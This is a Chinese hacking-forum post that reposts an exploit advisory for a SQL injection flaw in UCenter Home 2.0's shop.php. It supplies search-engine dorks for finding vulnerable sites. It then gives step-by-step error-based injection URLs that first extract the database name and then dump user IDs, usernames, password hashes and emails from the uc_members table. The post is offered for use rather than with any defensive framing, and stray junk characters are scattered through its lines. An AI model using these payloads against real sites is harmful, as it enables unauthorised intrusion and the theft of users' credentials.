找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2011|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:31:31 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
# U% c3 g. j3 I1 Q3 z8 D
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__  
$ A0 D+ k7 X8 Z5 R
, U. L# ~& M1 b. h                                 
# ]" f7 r0 ~+ ~" w) ^6 O0 n+ e$ V
4 q* u3 g' h& e" F3 [8 |+ @  m*/ Author : KnocKout  0 a" {5 C! |/ h2 g+ I; ]

" I7 H( s5 Q6 W6 U*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers    j# D/ `7 ?8 E4 x  Q3 S( C* `
" O7 W  L# T1 b4 H0 G: N
*/ Contact: knockoutr@msn.com  % j8 b# h9 I7 q" h, q$ T/ ?$ z3 H
7 G/ W; g1 C5 j! C: s7 p. ?, b
*/ Cyber-Warrior.org/CWKnocKout  
4 `9 f# U9 D2 G1 J! M( E( G! d' ~5 L
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
7 o! m& J, a$ h9 ]: f! I
' v3 t  p9 |5 V# K# K% TScript : UCenter Home  / O" G, L3 V( x! Y1 E& K+ p2 A

' D5 v. b' S  \5 DVersion : 2.0  9 f8 X+ c3 f  T+ ?/ N1 X% ^9 y

2 @, x) I: L- h4 i: ~# ?! e1 V1 j5 x3 {Script HomePage : http://u.discuz.net/  & ?. F) _+ J! G0 X% v6 Q# G
3 y; v& U4 `% }$ V& v7 }, q) I
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
9 _. l7 f8 z: W
& Z5 N; F  Q, K+ JDork : Powered by UCenter inurl:shop.php?ac=view  / M5 G/ K6 L# E7 K) `/ }
% Q5 m1 v0 o& z6 F, ]4 h) [$ e# W
Dork 2 : inurl:shop.php?ac=view&shopid=  + o% e9 E9 l* g0 J& @9 J" q
4 b+ Z, f, c) [7 B
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
" I+ A9 T4 B6 {: s( y3 u8 n. Q" N( ]* j
9 a3 w: r  N5 _Vuln file : Shop.php  2 V( Q$ G0 o4 A8 g* i
4 R, M3 q9 W. }8 H2 A; i( H1 X
value's : (?)ac=view&shopid=  $ S0 B" c/ h! r, x! E9 G3 r/ l
& ~, |/ m) g; O9 w, L( b
Vulnerable Style : SQL Injection (MySQL Error Based)  + s5 ]1 S2 r3 N0 Y, E5 J* D; Z! q2 e
, e1 N+ W6 x0 [3 x
Need Metarials : Hex Conversion  8 o4 }, E* F/ ]: X! k
# b. k/ d8 f& S( A; j
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==  
1 X8 f9 D/ J5 l& C4 m3 ?
( \* X" B. E( j& Z" b% n2 dYour Need victim Database name.   
7 P5 o) E2 j* w4 \7 r) s! Z2 o9 S* r9 ^* K/ K- p+ b
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  2 M3 f8 M, b9 p8 r4 @5 l' S, W+ s
4 l- H: L3 x* f* I( T0 Y. R
..  
! h6 w# k; z9 F& ]. G! t2 F2 G
$ H: J+ I* V5 d0 U2 K0 RDB : Okey.  3 _7 v, z8 }" F0 F* E% C! B

( e; r3 W4 K* t, U) ?9 H( U- ?6 v7 U# }your edit DB `[TARGET DB NAME]`  
% j+ A# }! G0 t: @8 I
" @& s: m( |7 G; E# P; B- F/ XExample : 'hiwir1_ucenter'  
- ]' [2 X& w: j( `  \" O# W$ b6 ^0 {( ~! Y
Edit : Okey.  
' Z6 R0 z# k. V+ B0 l/ n
9 x6 ?- T3 ^" b5 \4 V) }# mYour use Hex conversion. And edit Your SQL Injection Exploit..  
7 n% g: \+ t3 N  f! u/ A  e3 ^; }: M) f# v' G3 j5 `
   
+ {( ]% V) @3 ]8 F8 I6 q/ X. E7 b" i1 ~1 ~" T; b& n
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1  
# J) E; w) |* T4 u
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表